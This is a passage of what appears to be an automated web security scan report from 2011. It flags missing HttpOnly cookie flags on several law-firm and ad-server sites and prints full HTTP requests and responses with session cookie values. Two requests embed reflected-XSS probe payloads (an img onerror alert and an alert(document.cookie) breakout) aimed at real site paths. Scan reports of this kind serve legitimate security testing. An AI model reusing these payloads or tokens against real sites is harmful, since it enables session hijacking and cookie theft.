Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:08:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=18263646;expires=Fri, 11-Jan-2041 15:08:47 GMT;path=/
Set-Cookie: CFTOKEN=41801191;expires=Fri, 11-Jan-2041 15:08:47 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...

10.4. http://www.dcchamber.org/chamber/memberDetail.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dcchamber.org
Path:   /chamber/memberDetail.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /chamber/memberDetail.asp HTTP/1.1
Host: www.dcchamber.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 19 Jan 2011 15:47:49 GMT
Server: Apache/2.0.63 (Red Hat)
Set-Cookie: PHPSESSID=r9mt7q2l6q33qih8ijabts6j75; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...

10.5. http://www.ebglaw.com/showoffice.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ebglaw.com
Path:   /showoffice.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /showoffice.aspx HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 19 Jan 2011 15:48:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /404.aspx?error=500
Set-Cookie: ASP.NET_SessionId=ld121hju5gt2vlvrg5m2cm45; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 136

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/404.aspx?error=500'>here</a>.</h2>
</body></html>

10.6. http://www.fulbright.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A31%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D512%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:49:31 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...

10.7. http://www.fulbright.com/dc  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /dc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dc HTTP/1.1
Host: www.fulbright.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:08:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/
Set-Cookie: CFTOKEN=35971701;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A41%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A40%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.8. http://www.fulbright.com/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.cfm HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFCLIENT_WWW2=recentsearch%3D%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A35%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D6%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...

10.9. http://www.kasimer-ittig.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kasimer-ittig.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.kasimer-ittig.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 16:51:53 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=4052ec2bf88a4da47375c5323832d37b72f3a1d2; path=/; expires=Wed, 19-Jan-2011 17:51:53 GMT
Content-Length: 45526
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...

10.10. http://www.political.cov.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.political.cov.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.political.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:55:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=18273037;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/
Set-Cookie: CFTOKEN=87095538;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>Covington Political Broadcasting Law</title
...[SNIP]...

10.11. http://www.vault.com/wps/portal/usa/rankings/individual  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wps/portal/usa/rankings/individual HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:39 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000iBjnc7dCLUAc9Rch1_CgmMI:140i3s34m; Path=/
Keep-Alive: timeout=10, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:11:44 GMT;path=/
Content-Length: 103574


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...

10.12. http://www.wileyrein.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wileyrein.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:08:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=18263656;expires=Fri, 11-Jan-2041 15:08:55 GMT;path=/
Set-Cookie: CFTOKEN=43582841;expires=Fri, 11-Jan-2041 15:08:55 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...

10.13. http://ads.roiserver.com/cf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /cf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cf?con=41cafe7%2B34f5e64%2Bb3b11e8&rand=1295459680369&sid=&xurl= HTTP/1.1
Host: ads.roiserver.com
Proxy-Connection: keep-alive
Referer: http://ads.roiserver.com/disp?pid=2DFE311&rand=22153025
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
SAdBuild: 400
P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml"
Set-Cookie: sadsp-2DFE311="41cafe7/129545968,34f5e64/129545968,b3b11e8/129545968"; Version=1; Domain=ads.roiserver.com; Max-Age=87840; Expires=Thu, 20-Jan-2011 18:18:42 GMT; Path=/
Content-Type: image/gif
Content-Length: 807
Date: Wed, 19 Jan 2011 17:54:42 GMT
Connection: close

GIF89a....................................................................................................................................3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f....
...[SNIP]...

10.14. http://ads.roiserver.com/click  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /click

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click?clid=41cafe7&rand=1295459680368&sid= HTTP/1.1
Host: ads.roiserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sadsp-2DFE311="41cafe7/129545968,34f5e64/129545968,b3b11e8/129545968";

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
SAdBuild: 400
P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml"
Set-Cookie: sadscpax=41cafe7-; Domain=ads.roiserver.com; Expires=Thu, 20-Jan-2011 18:29:21 GMT; Path=/
Location: http://clkrd.com/ad.php?o=acai
Content-Length: 0
Date: Wed, 19 Jan 2011 18:05:21 GMT
Connection: close


10.15. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035991&rn=57307763&c7=http%3A%2F%2Fwww.yellowpages.com%2FWashington-DC74302%253Cimg%2520src%253da%2520onerror%253dalert(1)%253E9c7a66be0e0%2FAttorneys&c8=No%20Location%20Found%20-%20YP.com&c9=http%3A%2F%2Fburp%2Fshow%2F1&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/Attorneys
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Wed, 19 Jan 2011 15:26:51 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Fri, 18-Jan-2013 15:26:51 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.16. http://d7.zedo.com/OzoDB/cutils/R52_5/jsc/933/egc.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /OzoDB/cutils/R52_5/jsc/933/egc.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OzoDB/cutils/R52_5/jsc/933/egc.js HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 6
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008:0,0|0,11,1:0,17,1:0,16,0;expires=Fri, 18 Feb 2011 18:07:18 GMT;path=/;domain=.zedo.com;
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 2608430956
Cache-Control: max-age=2007212
Expires: Fri, 11 Feb 2011 23:40:50 GMT
Date: Wed, 19 Jan 2011 18:07:18 GMT
Connection: close



10.17. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d3/jsc/fm.js HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 911
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0daa-82a5-4989a5927aac0"
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=285
Expires: Wed, 19 Jan 2011 18:11:59 GMT
Date: Wed, 19 Jan 2011 18:07:14 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo
...[SNIP]...

10.18. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 15:50:43 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=301
Expires: Wed, 19 Jan 2011 15:55:44 GMT
Date: Wed, 19 Jan 2011 15:50:43 GMT
Connection: close
Content-Length: 2277

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...

10.19. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d3/jsc/fmr.js HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 912
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=284
Expires: Wed, 19 Jan 2011 18:11:59 GMT
Date: Wed, 19 Jan 2011 18:07:15 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo
...[SNIP]...

10.20. http://d7.zedo.com/bar/v16-401/d3/jsc/gl.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-401/d3/jsc/gl.js HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1099
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
